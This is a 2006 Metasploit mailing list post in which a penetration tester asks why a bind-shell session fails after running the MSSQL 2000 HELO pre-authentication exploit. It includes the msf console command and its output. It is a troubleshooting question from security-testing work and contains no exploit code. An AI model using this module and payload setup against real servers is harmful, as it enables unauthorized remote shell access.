Metasploit mailing list archives
Exploit MSSQL HELO vuln
From: joshuaperrymon at gmail.com (Josh L. Perrymon)
Date: Wed, 5 Apr 2006 13:11:51 +1000
Hey Guys, I'm working on a penetration test and have found a MSSQL install vulnerable to the HELO exploit- Both networks are behind firewalls... )attacker and (target I setup metasploit 2.5 with the exploit > Payload > and RHOST and LHOST info.. Exploit is sent using win32_bindshell ------------------- msf mssql2000_preauthentication(win32_bind) > exploit [*] Starting Bind Handler. [*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000 (0x42b68aba / 0x42d01e50) [*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334 [*] Exiting Bind Handler. msf mssql2000_preauthentication(win32_bind) > -------------------------- Does this mean the remote machine has a connection to my local machine? When I try telnetting to 127.0.0.1:33334 it has a blinking cursor then drops the connection???? I haven't used the bind_shell payload before becuase I usually have the ability to put myself outside the firewall when attampting exploits. Thanks for the help... JP -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060405/70555ac4/attachment.htm>
Current thread:
- Exploit MSSQL HELO vuln Josh L. Perrymon (Apr 04)
- Exploit MSSQL HELO vuln H D Moore (Apr 05)